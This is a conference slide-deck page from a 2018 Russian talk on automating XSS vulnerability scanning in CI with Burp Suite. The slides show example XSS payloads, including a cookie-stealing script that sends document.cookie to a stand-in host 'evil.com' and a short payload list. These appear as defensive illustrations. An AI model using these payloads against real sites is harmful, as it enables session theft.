Upgrade to Pro — share decks privately, control downloads, hide ads and more …

CodeFest 2018. Владимир Смирнов (СКБ Контур) — Ломать – не строить! Автоматизируем поиск XSS-уязвимостей

CodeFest
April 09, 2018
Programming
0
510

CodeFest 2018. Владимир Смирнов (СКБ Контур) — Ломать – не строить! Автоматизируем поиск XSS-уязвимостей

Посмотрите выступление Владимира: https://2018.codefest.ru/lecture/1345/

Допустим, специалисты по безопасности нашли в нашем приложении уязвимости, они оказались просты в эксплуатации и очень опасны. Мы можем их исправить, но как убедиться, что через некоторое время не появятся новые?

Отныне искать уязвимости в каждом обновлении будут сканеры: если они что-нибудь найдут, релиз в продакшн не уедет. Сейчас мы научились работать с XSS и уже нашли с помощью такого подхода уязвимости.

В докладе расскажем о нашем опыте в автоматизации поиска XSS-уязвимостей: что нас к этому привело, как решали задачу и с какими проблемами столкнулись. Поговорим о том, как проверять сложное веб-приложение на наличие уязвимостей, чем можно пользоваться для поиска, какие еще виды уязвимостей можно искать в автоматическом режиме и реально ли сделать поиск уязвимостей частью CI.

CodeFest

April 09, 2018
Tweet

More Decks by CodeFest

See All by CodeFest
CodeFest 2019. Илья Редько (ONLY) — Дизайн без правок
codefest
1
700
CodeFest 2019. Александр Зезюлин (Wargaming) – Прекрасное далёко
codefest
0
680
CodeFest 2019. Александр Баяндин (Badoo) — Нетрадиционное использование автотестов
codefest
0
1.1k
CodeFest 2019. Антон Кочепасов (Rambus) — Как считать на питоне быстрее, чем на C++
codefest
0
710
CodeFest 2019. Александр Лысковский (iFarm Project, Alawar, Welltory) — Как придумывать новое: продукты, бизнесы, ниши
codefest
0
760
CodeFest 2019. Роман Квартальнов (Zephyr) — Почему Project Manager косячит?
codefest
0
910
CodeFest 2019. Florian Rival (Facebook) — Beyond Web-Apps: WebAssembly, JS and React to rewrite native apps
codefest
0
680
CodeFest 2019. Андрей Паньгин (Одноклассники) — JVM TI: как сделать «плагин» для виртуальной машины
codefest
0
980
CodeFest 2019. Владимир Плизга (ЦФТ) — Перевод Spring Boot микросервисов с Java 8 на 11: что может пойти -не- так?
codefest
0
1.3k

Other Decks in Programming

See All in Programming
VSCodeでのDatabricks開発もお勧めしたい/I would also recommend Databricks development with VSCode.
kazumain
0
240
元気予報
suu_mire0726
0
860
コードレビューで学ぶ!Kotlinオブジェクト指向デザインパターン
akkie76
2
180
SwiftUI Performance 不要なViewの再描画と更新を抑える
bigamitiongit
1
160
PostmanでAPIの動作確認が楽になった話
h455h1
0
140
ONE WEDGE_company_guide
1wedge_one
0
390
0→1と1→10の狭間で Javaという技術選定を振り返る/Reflecting on the Decision to Choose Java Between Scaling from 0 to 1 and 1 to 10
jaguar_imo
2
370
Behind VS Code Extensions for JavaScript / TypeScript Linnting and Formatting
unvalley
4
310
R言語の環境構築と基礎 Tokyo.R 112
bob3bob3
0
170
甘い香りに誘われてVanilla Extractを1年間運用してみた
miyahkun
1
110
Tailwind CSSを本気でカスタマイズする方法
fsubal
9
3.5k
スキーマ駆動開発による品質とスピードの両立 - 私達は何故、スキーマを書くのか
kentaroutakeda
0
130

Featured

See All Featured
The Art of Programming - Codeland 2020
erikaheidi
41
12k
How GitHub Uses GitHub to Build GitHub
holman
468
290k
Into the Great Unknown - MozCon
thekraken
10
980
A Philosophy of Restraint
colly
196
16k
We Have a Design System, Now What?
morganepeng
42
6.7k
Fontdeck: Realign not Redesign
paulrobertlloyd
76
4.9k
What's in a price? How to price your products and services
michaelherold
237
11k
Intergalactic Javascript Robots from Outer Space
tanoku
266
26k
Visualization
eitanlees
135
14k
Large-scale JavaScript Application Architecture
addyosmani
503
110k
Web development in the modern age
philhawksworth
202
10k
The Power of CSS Pseudo Elements
geoffreycrofte
59
5k

Transcript

  1. Ломать - не строить! Автоматизируем поиск XSS-уязвимостей Владимир Смирнов Инженер-

    программист

  2. О себе • Контур.Экстерн • Инженер-программист • CTF 2

  3. С чего все началось • Найдены XSS-уязвимости • Непонятно, как

    избегать появления новых 3

  4. Причины • Безопасность • Размер проекта • Частота обновлений 4

  5. Почему XSS? 5

  6. Что такое XSS? https://example.com/?q=<script>alert(‘Mwahaha’)</script> 6

  7. Что такое XSS? https://example.com/ ?text=<script>document.location=’evil.com/?’ + document.cookie</script> 7

  8. Что такое XSS? https://example.com/ ?text=<script>document.location=’evil.com/?’ + document.cookie</script> goo.gl/oe8LWs 8

  9. Что такое XSS? https://example.com/ ?text=<script>document.location=’evil.com/?’ + document.cookie</script> goo.gl/oe8LWs 9

  10. Цель Автоматизировать поиск XSS-уязвимостей перед выпуском обновлений 10

  11. • > 90% уязвимостей • < 2 часов • Разные

    релизные циклы Критерии 11

  12. Цель 12

  13. Цель 13

  14. Схема работы 14

  15. Запросы • access.logs • Автотесты • Дамп трафика 15

  16. Запросы 16

  17. Payloads • Общие • Для технологии • Для приложения 17

  18. Payloads <script>alert(‘XSS’)</script> <img src=xss onerror=alert(‘XSS’)> {{constructor.constructor('alert(1)')()}} http://bit.do/xsspayloads 18

  19. Intruder 19

  20. Intruder 20 GET /?a=1&b=1 POST / GET /?a=payload1&b=1 GET /?a=payload2&b=1

    payload1 payload2 GET /?a=1&b=payload1 GET /?a=1&b=payload2

  21. Intruder 21 GET /?a=1&b=1 POST / Header: payload1 Header: payload2

    payload1 payload2 Body: payload1 Body: payload2

  22. Detector 22

  23. Detector 23

  24. Почему Burp Suite? • Работа с большим количеством запросов •

    Возможность создания плагинов • Большое коммьюнити 24

  25. Burp 25

  26. Результаты 26

  27. Поиск уязвимостей в CI • Встраиваемость Но: • Долго работает

    • Возможна проверка не всех случаев 27

  28. Планы • Другие виды уязвимостей • Системный процесс • Массовое

    использование 28

  29. Выводы • Безопасность - больше закрытых уязвимостей • Простота настройки

    - нужен только набор запросов • Скорость работы - 1 час 29

  30. Кстати http://bit.do/securitytesting 30

  31. @DarkDodo888 Владимир Смирнов Инженер- программист Спасибо за внимание! [email protected] 31

  32. 32